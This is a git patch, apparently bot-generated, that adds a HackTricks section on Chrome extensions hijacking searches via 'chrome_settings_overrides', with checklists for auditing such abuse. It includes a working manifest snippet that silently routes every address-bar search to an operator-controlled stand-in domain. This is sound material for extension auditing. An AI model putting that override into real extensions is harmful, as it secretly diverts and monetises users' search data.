From 5b166444c71ce02e7c3c6bce90a7b36b66fce57f Mon Sep 17 00:00:00 2001 From: HackTricks News Bot Date: Tue, 9 Jun 2026 14:53:31 +0000 Subject: [PATCH] Add content from: SearchJack: 23 Chrome Extensions Silently Monetize ~758,000 ... --- ...rowext-permissions-and-host_permissions.md | 42 +++++++++++++++++++ 1 file changed, 42 insertions(+) diff --git a/src/pentesting-web/browser-extension-pentesting-methodology/browext-permissions-and-host_permissions.md b/src/pentesting-web/browser-extension-pentesting-methodology/browext-permissions-and-host_permissions.md index 816be994884..3c92bb2750c 100644 --- a/src/pentesting-web/browser-extension-pentesting-methodology/browext-permissions-and-host_permissions.md +++ b/src/pentesting-web/browser-extension-pentesting-methodology/browext-permissions-and-host_permissions.md @@ -110,6 +110,45 @@ The extension storage is merely a key-value collection, very similar to [localSt However, advertising companies could also abuse this storage. +### Search provider hijacking with `chrome_settings_overrides` + +A **low-permission** extension can still **take over omnibox searches** via **`chrome_settings_overrides.search_provider`**. Chrome allows an extension to define a custom search endpoint containing **`{searchTerms}`**, so a manifest-only extension can silently route every address-bar search through operator-controlled infrastructure: + +```json +"chrome_settings_overrides": { + "search_provider": { + "name": "Search", + "keyword": "search.example", + "search_url": "https://search.example/search?q={searchTerms}", + "is_default": true + } +} +``` + +This is useful for **search affiliate hijacking** because the extension might need **no content scripts**, **no background logic**, and **no extra API permissions** while still gaining access to a very sensitive data stream: user search intent. + +### Auditing search-override abuse + +When reviewing a browser extension, check whether the advertised feature matches the search override: + +- Search for **`chrome_settings_overrides`**, **`search_provider`**, **`search_url`**, and **`is_default`** in `manifest.json`. +- Flag **manifest-only shells** whose main behavior is changing the default search provider. +- Compare the **extension branding** with the **search endpoint domain**. Utility/new-tab/map/video extensions pointing searches to unrelated domains are suspicious. +- Inspect whether the redirect chain lands in **affiliate search networks**. Parameters such as **`hspart`** and **`hsimp`** are useful to attribute the broker/campaign behind Yahoo Hosted Search style monetization. +- Cluster disposable extensions by repeated backend templates such as identical query parameters, shared paths like **`/admin/public/link`** or **`serp.php`**, and reused search domains. +- Compare **store claims** and **privacy policies**. False claims such as “we do not track searches” are strong indicators when the extension clearly proxies queries. + +### Runtime redirect rules can hide the real routing + +Static package review may still miss the real search flow. An extension can ship benign-looking static rules and then install the real redirect logic at runtime via **`chrome.declarativeNetRequest.updateDynamicRules()`**. + +Practical checks: + +- Inspect the **service worker/background script** for `updateDynamicRules()`. +- In an instrumented browser, dump live rules with **`chrome.declarativeNetRequest.getDynamicRules()`** from the extension context. +- Capture **network traffic** while performing omnibox searches and follow the **full redirect chain** until the final search provider. +- Treat decoy static files such as `redirect-rules.json` as insufficient evidence of benign behavior unless runtime rules and live traffic match. + ### More permissions Manifest V3 split page access from API permissions: **`permissions`** still governs privileged APIs (cookies, tabs, history, scripting, etc.) while **`host_permissions`** controls which origins those APIs can touch. MV3 also made host permissions **runtime‑grantable**, so extensions can ship with none and pop a consent prompt later via `chrome.permissions.request()`—handy for legit least‑privilege flows, but also abused by malware to escalate after reputation is established. @@ -156,6 +195,9 @@ However, tightening security measures often results in decreased flexibility and - [https://www.cobalt.io/blog/introduction-to-chrome-browser-extension-security-testing](https://www.cobalt.io/blog/introduction-to-chrome-browser-extension-security-testing) - [https://gitlab-com.gitlab.io/gl-security/security-tech-notes/threat-intelligence-tech-notes/malicious-browser-extensions-feb-2025/](https://gitlab-com.gitlab.io/gl-security/security-tech-notes/threat-intelligence-tech-notes/malicious-browser-extensions-feb-2025/) - [https://developer.chrome.com/blog/resuming-the-transition-to-mv3/](https://developer.chrome.com/blog/resuming-the-transition-to-mv3/) +- [https://malext.io/reports/SearchJack/](https://malext.io/reports/SearchJack/) +- [https://developer.chrome.com/docs/extensions/reference/manifest/chrome-settings-override](https://developer.chrome.com/docs/extensions/reference/manifest/chrome-settings-override) +- [https://developer.chrome.com/docs/extensions/reference/api/declarativeNetRequest](https://developer.chrome.com/docs/extensions/reference/api/declarativeNetRequest) {{#include ../../banners/hacktricks-training.md}}